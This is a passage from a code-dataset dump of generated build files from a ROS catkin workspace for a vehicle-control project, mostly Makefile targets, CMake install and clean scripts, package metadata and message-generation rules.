steer/CMakeFiles/steer_generate_messages_eus.dir/build.make steer/CMakeFiles/steer_generate_messages_eus.dir/build\n.PHONY : steer_generate_messages_eus/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_gennodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_gennodejs.dir/rule\n.PHONY : steer/CMakeFiles/steer_gennodejs.dir/rule\n\n# Convenience name for target.\nsteer_gennodejs: steer/CMakeFiles/steer_gennodejs.dir/rule\n\n.PHONY : steer_gennodejs\n\n# fast build rule for target.\nsteer_gennodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_gennodejs.dir/build.make steer/CMakeFiles/steer_gennodejs.dir/build\n.PHONY : steer_gennodejs/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages_py.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages_py.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages_py: steer/CMakeFiles/steer_generate_messages_py.dir/rule\n\n.PHONY : steer_generate_messages_py\n\n# fast build rule for target.\nsteer_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_generate_messages_py.dir/build.make steer/CMakeFiles/steer_generate_messages_py.dir/build\n.PHONY : steer_generate_messages_py/fast\n\nsrc/pure_pursuit.o: src/pure_pursuit.cpp.o\n\n.PHONY : src/pure_pursuit.o\n\n# target to build an object file\nsrc/pure_pursuit.cpp.o:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/pure_pursuit.dir/build.make steer/CMakeFiles/pure_pursuit.dir/src/pure_pursuit.cpp.o\n.PHONY : src/pure_pursuit.cpp.o\n\nsrc/pure_pursuit.i: src/pure_pursuit.cpp.i\n\n.PHONY : src/pure_pursuit.i\n\n# target to preprocess a source file\nsrc/pure_pursuit.cpp.i:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/pure_pursuit.dir/build.make steer/CMakeFiles/pure_pursuit.dir/src/pure_pursuit.cpp.i\n.PHONY : src/pure_pursuit.cpp.i\n\nsrc/pure_pursuit.s: src/pure_pursuit.cpp.s\n\n.PHONY : src/pure_pursuit.s\n\n# target to generate assembly 
for a file\nsrc/pure_pursuit.cpp.s:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/pure_pursuit.dir/build.make steer/CMakeFiles/pure_pursuit.dir/src/pure_pursuit.cpp.s\n.PHONY : src/pure_pursuit.cpp.s\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... install\"\n\t@echo \"... test\"\n\t@echo \"... pure_pursuit\"\n\t@echo \"... steer_genpy\"\n\t@echo \"... steer_gencpp\"\n\t@echo \"... steer_generate_messages_cpp\"\n\t@echo \"... install/local\"\n\t@echo \"... steer_generate_messages\"\n\t@echo \"... steer_geneus\"\n\t@echo \"... edit_cache\"\n\t@echo \"... steer_generate_messages_lisp\"\n\t@echo \"... steer_genlisp\"\n\t@echo \"... list_install_components\"\n\t@echo \"... install/strip\"\n\t@echo \"... steer_generate_messages_nodejs\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... steer_generate_messages_eus\"\n\t@echo \"... steer_gennodejs\"\n\t@echo \"... steer_generate_messages_py\"\n\t@echo \"... src/pure_pursuit.o\"\n\t@echo \"... src/pure_pursuit.i\"\n\t@echo \"... src/pure_pursuit.s\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.7771739363670349,
"alphanum_fraction": 0.7989130616188049,
"avg_line_length": 45,
"blob_id": "d2e2519d768f1fbf11a655438675cfd202040b27",
"content_id": "9e176623fe3b974ca922cc73f564475770bb2d4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 4,
"path": "/devel/share/zfmsg/cmake/zfmsg-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(zfmsg_MSG_INCLUDE_DIRS \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg\")\nset(zfmsg_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7485029697418213,
"alphanum_fraction": 0.7485029697418213,
"avg_line_length": 40.75,
"blob_id": "ba841b64e7fb8314f7a11ea3f1fa4a60ff7cd354",
"content_id": "38704c3f9c8212c77725f19c3de41514bb1f592e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 4,
"path": "/build/path/catkin_generated/installspace/path-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${path_DIR}/..\" \"\" path_MSG_INCLUDE_DIRS UNIQUE)\nset(path_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7316666841506958,
"alphanum_fraction": 0.7383333444595337,
"avg_line_length": 53.54545593261719,
"blob_id": "1e79332bfbd2dd5b7150e87f547b17955f5d8512",
"content_id": "1a09c25190fe60e73738809f7a88a3891e8d5ff8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 600,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 11,
"path": "/build/steer/cmake/steer-genmsg-context.py",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.context.in\n\nmessages_str = \"\"\nservices_str = \"\"\npkg_name = \"steer\"\ndependencies_str = \"std_msgs;geometry_msgs;zf_msgs\"\nlangs = \"gencpp;geneus;genlisp;gennodejs;genpy\"\ndep_include_paths_str = \"std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg;geometry_msgs;/opt/ros/kinetic/share/geometry_msgs/cmake/../msg;zf_msgs;/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg\"\nPYTHON_EXECUTABLE = \"/usr/bin/python\"\npackage_has_static_sources = '' == 'TRUE'\ngenmsg_check_deps_script = \"/opt/ros/kinetic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py\"\n"
},
{
"alpha_fraction": 0.7591623067855835,
"alphanum_fraction": 0.7706806063652039,
"avg_line_length": 29.80645179748535,
"blob_id": "71374e59e81f55754354abfa74e6fa8cea87af7f",
"content_id": "12cf1011d35599d9a2587cea836869351129e63c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 955,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 31,
"path": "/src/path/CMakeLists.txt",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# %Tag(FULLTEXT)%\ncmake_minimum_required(VERSION 2.8.3)\nproject(path)\n\nset(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -std=c++11\")\n\n## Find catkin and any catkin packages\nfind_package(catkin REQUIRED COMPONENTS roscpp rospy std_msgs nav_msgs geometry_msgs genmsg zf_msgs)\n## Find Eigen, for matrix operation\nfind_package (Eigen3 )\n## find_package (Eigen3 REQUIRED )\n\n## Declare ROS messages and services\n#add_message_files(FILES Num.msg)\n# add_service_files(FILES AddTwoInts.srv)\n\n## Generate added messages and services\ngenerate_messages(DEPENDENCIES std_msgs)\n\n## Declare a catkin package\ncatkin_package()\n\n## Build talker and listener\ninclude_directories(include ${catkin_INCLUDE_DIRS})\n\nadd_executable(gps_planner src/gps_planner.cpp)\ntarget_link_libraries(gps_planner ${catkin_LIBRARIES} ${Boost_LIBRARIES} )\n#target_link_libraries(test_pos320 ${Boost_LIBRARIES} Eigen3::Eigen)\nadd_dependencies(gps_planner path_generate_messages_cpp)\n\n# %EndTag(FULLTEXT)%\n"
},
{
"alpha_fraction": 0.7449437975883484,
"alphanum_fraction": 0.7622472047805786,
"avg_line_length": 50.13793182373047,
"blob_id": "269db0ecb1d96bc3c09fe62704dc505ced931913",
"content_id": "c8998d2bb093b846e406825f9b794e449b2ae632",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 4450,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 87,
"path": "/build/zf_msgs/cmake_install.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# Install script for directory: /home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs\n\n# Set the install prefix\nif(NOT DEFINED CMAKE_INSTALL_PREFIX)\n set(CMAKE_INSTALL_PREFIX \"/home/zf/xuechong_ws/zhuifengShow0919/install\")\nendif()\nstring(REGEX REPLACE \"/$\" \"\" CMAKE_INSTALL_PREFIX \"${CMAKE_INSTALL_PREFIX}\")\n\n# Set the install configuration name.\nif(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME)\n if(BUILD_TYPE)\n string(REGEX REPLACE \"^[^A-Za-z0-9_]+\" \"\"\n CMAKE_INSTALL_CONFIG_NAME \"${BUILD_TYPE}\")\n else()\n set(CMAKE_INSTALL_CONFIG_NAME \"\")\n endif()\n message(STATUS \"Install configuration: \\\"${CMAKE_INSTALL_CONFIG_NAME}\\\"\")\nendif()\n\n# Set the component getting installed.\nif(NOT CMAKE_INSTALL_COMPONENT)\n if(COMPONENT)\n message(STATUS \"Install component: \\\"${COMPONENT}\\\"\")\n set(CMAKE_INSTALL_COMPONENT \"${COMPONENT}\")\n else()\n set(CMAKE_INSTALL_COMPONENT)\n endif()\nendif()\n\n# Install shared libraries without execute permission?\nif(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE)\n set(CMAKE_INSTALL_SO_NO_EXE \"1\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zf_msgs/msg\" TYPE FILE FILES\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n )\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zf_msgs/cmake\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/catkin_generated/installspace/zf_msgs-msg-paths.cmake\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/include\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/roseus/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/common-lisp/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/gennodejs/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n execute_process(COMMAND \"/usr/bin/python\" -m compileall \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/python2.7/dist-packages\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zf_msgs\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/pkgconfig\" TYPE FILE FILES 
\"/home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/catkin_generated/installspace/zf_msgs.pc\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zf_msgs/cmake\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/catkin_generated/installspace/zf_msgs-msg-extras.cmake\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zf_msgs/cmake\" TYPE FILE FILES\n \"/home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/catkin_generated/installspace/zf_msgsConfig.cmake\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/catkin_generated/installspace/zf_msgsConfig-version.cmake\"\n )\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zf_msgs\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/package.xml\")\nendif()\n\n"
},
{
"alpha_fraction": 0.7507787942886353,
"alphanum_fraction": 0.7912772297859192,
"avg_line_length": 34.66666793823242,
"blob_id": "eea956d3cf97105e7ff9f419188acf94c8333618",
"content_id": "72bd26370f6114440e045623f276c03491cd859b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 321,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 9,
"path": "/build/pos320/CMakeFiles/pos320_generate_messages_eus.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/pos320_generate_messages_eus\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/pos320/manifest.l\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/pos320_generate_messages_eus.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.728863000869751,
"alphanum_fraction": 0.7346938848495483,
"avg_line_length": 41.9375,
"blob_id": "75a702598e8c5cb88059b90af3ce021e86ae6dd9",
"content_id": "cbc5e231fe7f69ab21eb36af90bd1f4a105f02a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 686,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 16,
"path": "/build/zf_msgs/catkin_generated/package.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"zf_msgs\")\nset(zf_msgs_VERSION \"1.8.0\")\nset(zf_msgs_MAINTAINER \"Xue Chong <[email protected]>\")\nset(zf_msgs_PACKAGE_FORMAT \"1\")\nset(zf_msgs_BUILD_DEPENDS \"message_generation\" \"std_msgs\" \"geometry_msgs\")\nset(zf_msgs_BUILD_EXPORT_DEPENDS \"message_runtime\" \"std_msgs\" \"geometry_msgs\")\nset(zf_msgs_BUILDTOOL_DEPENDS \"catkin\")\nset(zf_msgs_BUILDTOOL_EXPORT_DEPENDS )\nset(zf_msgs_EXEC_DEPENDS \"message_runtime\" \"std_msgs\" \"geometry_msgs\")\nset(zf_msgs_RUN_DEPENDS \"message_runtime\" \"std_msgs\" \"geometry_msgs\")\nset(zf_msgs_TEST_DEPENDS )\nset(zf_msgs_DOC_DEPENDS )\nset(zf_msgs_URL_WEBSITE \"\")\nset(zf_msgs_URL_BUGTRACKER \"\")\nset(zf_msgs_URL_REPOSITORY \"\")\nset(zf_msgs_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.7722152471542358,
"alphanum_fraction": 0.8022528290748596,
"avg_line_length": 56.07143020629883,
"blob_id": "86de7f81e7a3c08523ff26ba29900bba1c4af393",
"content_id": "07ce644f814ac5a644df32a03e89e6dd5df6d24c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 799,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 14,
"path": "/build/zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zfmsg_generate_messages_nodejs\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/BreakStatus.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/SteerStatus.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/ThrottleGearStatus.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/MotionCmd.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/CanInfo.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg/msg/CanInfoAW.js\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zfmsg_generate_messages_nodejs.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.6530324220657349,
"alphanum_fraction": 0.7306064963340759,
"avg_line_length": 43.375,
"blob_id": "50bf0cf21eeeb39b3c9320f9b4ba68732c2b78e6",
"content_id": "b125d98cb35e189c48db2b232616280fe1933e76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 709,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 16,
"path": "/build/pos320/catkin_generated/package.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"pos320\")\nset(pos320_VERSION \"0.1.0\")\nset(pos320_MAINTAINER \"Your Name <[email protected]>\")\nset(pos320_PACKAGE_FORMAT \"2\")\nset(pos320_BUILD_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(pos320_BUILD_EXPORT_DEPENDS )\nset(pos320_BUILDTOOL_DEPENDS \"catkin\")\nset(pos320_BUILDTOOL_EXPORT_DEPENDS )\nset(pos320_EXEC_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(pos320_RUN_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(pos320_TEST_DEPENDS )\nset(pos320_DOC_DEPENDS )\nset(pos320_URL_WEBSITE \"http://wiki.ros.org/pos320\")\nset(pos320_URL_BUGTRACKER \"\")\nset(pos320_URL_REPOSITORY \"\")\nset(pos320_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.7517962455749512,
"alphanum_fraction": 0.7642503380775452,
"avg_line_length": 39.40645217895508,
"blob_id": "7ac46d2a5f90d0193e50a7ed4c352373162e2c90",
"content_id": "b3131983b3bd542bb3091dd30494c987e0bc3d8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 12526,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 310,
"path": "/build/zf_msgs/cmake/zf_msgs-genmsg.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(STATUS \"zf_msgs: 2 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Izf_msgs:/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg;-Istd_msgs:/opt/ros/kinetic/share/std_msgs/cmake/../msg;-Igeometry_msgs:/opt/ros/kinetic/share/geometry_msgs/cmake/../msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(gennodejs REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(zf_msgs_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_custom_target(_zf_msgs_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zf_msgs\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_custom_target(_zf_msgs_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zf_msgs\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" \"geometry_msgs/Pose2D:std_msgs/Header\"\n)\n\n#\n# langs = gencpp;geneus;genlisp;gennodejs;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n_generate_msg_cpp(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zf_msgs\n)\n_generate_msg_cpp(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/geometry_msgs/cmake/../msg/Pose2D.msg;/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zf_msgs\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(zf_msgs\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zf_msgs\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(zf_msgs_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(zf_msgs_generate_messages zf_msgs_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_cpp _zf_msgs_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_cpp _zf_msgs_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zf_msgs_gencpp)\nadd_dependencies(zf_msgs_gencpp zf_msgs_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zf_msgs_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n_generate_msg_eus(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zf_msgs\n)\n_generate_msg_eus(zf_msgs\n 
\"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/geometry_msgs/cmake/../msg/Pose2D.msg;/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zf_msgs\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(zf_msgs\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zf_msgs\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(zf_msgs_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(zf_msgs_generate_messages zf_msgs_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_eus _zf_msgs_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_eus _zf_msgs_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zf_msgs_geneus)\nadd_dependencies(zf_msgs_geneus zf_msgs_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zf_msgs_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n_generate_msg_lisp(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zf_msgs\n)\n_generate_msg_lisp(zf_msgs\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/geometry_msgs/cmake/../msg/Pose2D.msg;/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zf_msgs\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(zf_msgs\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zf_msgs\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(zf_msgs_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(zf_msgs_generate_messages zf_msgs_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pos320.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_lisp _zf_msgs_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg/pose2dArray.msg\" NAME_WE)\nadd_dependencies(zf_msgs_generate_messages_lisp _zf_msgs_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zf_msgs_genlisp)\nadd_dependencies(zf_msgs_genlisp zf_msgs_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND 